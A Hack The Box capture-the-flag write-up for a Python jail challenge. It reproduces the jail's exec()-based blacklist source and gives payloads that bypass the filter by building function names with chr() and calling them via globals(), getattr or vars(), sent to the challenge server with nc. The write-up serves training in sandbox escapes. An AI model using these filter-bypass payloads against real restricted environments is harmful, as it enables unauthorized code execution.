$ cat writeup.md…
$ cat writeup.md…
hackthebox
Task: Escape a Python jail with exec() that blacklists import, os, eval, open, quotes, and brackets. Solution: Call the open_chest() function (which reads the flag) by constructing the string "open_chest" using chr() concatenation and accessing it via globals().get() to avoid blocked quotes and brackets.
"A test! Getting onto the team is one thing, but you must prove your skills to be chosen to represent the best of the best. They have given you the classic - a restricted environment, devoid of functionality, and it is up to you to see what you can do. Can you break open the chest? Do you have what it takes to bring humanity from the brink?"
Connection: nc 94.237.61.249 54149
The challenge provides a Python jail where user input is executed via exec(), but with a blacklist filter.
banner = r''' .____ __ .___ _____ | | ____ ____ | | __ ____ __| _/ / _ \__ _ _______ ___.__. | | / _ \_/ ___\| |/ // __ \ / __ | / /_\ \ \/ \/ /\__ \< | | | |__( <_> ) \___| <\ ___// /_/ | / | \ / / __ \\___ | |_______ \____/ \___ >__|_ \\___ >____ | \____|__ /\/\_/ (____ / ____| \/ \/ \/ \/ \/ \/ \/\/ ''' def open_chest(): with open('flag.txt', 'r') as f: print(f.read()) blacklist = [ 'import', 'os', 'sys', 'breakpoint', 'flag', 'txt', 'read', 'eval', 'exec', 'dir', 'print', 'subprocess', '[', ']', 'echo', 'cat', '>', '<', '"', '\'', 'open' ] print(banner) while True: command = input('The chest lies waiting... ') if any(b in command for b in blacklist): print('Invalid command!') continue try: exec(command) except Exception: print('You have been locked away...') exit(1337)
| Category | Blocked Items |
|---|---|
| Keywords | import, os, sys, breakpoint, eval, exec, dir, print, subprocess |
| File-related | flag, txt, read, open |
| Dangerous chars | [, ], >, <, ", ' |
| Shell commands | echo, cat |
Call the open_chest() function which reads and prints the flag.
The function name open_chest contains open which is blacklisted!
[]: Use globals().get() instead of globals()['key']chr() function| Char | Code |
|---|---|
| o | 111 |
| p | 112 |
| e | 101 |
| n | 110 |
| _ | 95 |
| c | 99 |
| h | 104 |
| e | 101 |
| s | 115 |
| t | 116 |
globals().get(chr(111)+chr(112)+chr(101)+chr(110)+chr(95)+chr(99)+chr(104)+chr(101)+chr(115)+chr(116))()
How it works:
chr(111)+chr(112)+chr(101)+chr(110) = "open"chr(95) = "_"chr(99)+chr(104)+chr(101)+chr(115)+chr(116) = "chest"globals().get("open_chest") returns the function object() calls the functionprintf 'globals().get(chr(111)+chr(112)+chr(101)+chr(110)+chr(95)+chr(99)+chr(104)+chr(101)+chr(115)+chr(116))()\n' | nc 94.237.61.249 54149
getattr(getattr(__builtins__, chr(103)+chr(108)+chr(111)+chr(98)+chr(97)+chr(108)+chr(115))(), chr(111)+chr(112)+chr(101)+chr(110)+chr(95)+chr(99)+chr(104)+chr(101)+chr(115)+chr(116))()
vars().get(chr(111)+chr(112)+chr(101)+chr(110)+chr(95)+chr(99)+chr(104)+chr(101)+chr(115)+chr(116))()
$ cat /etc/motd
Liked this one?
Pro unlocks every complete writeup and expanded API access. $9/mo.
$ cat pricing.md$ grep --similar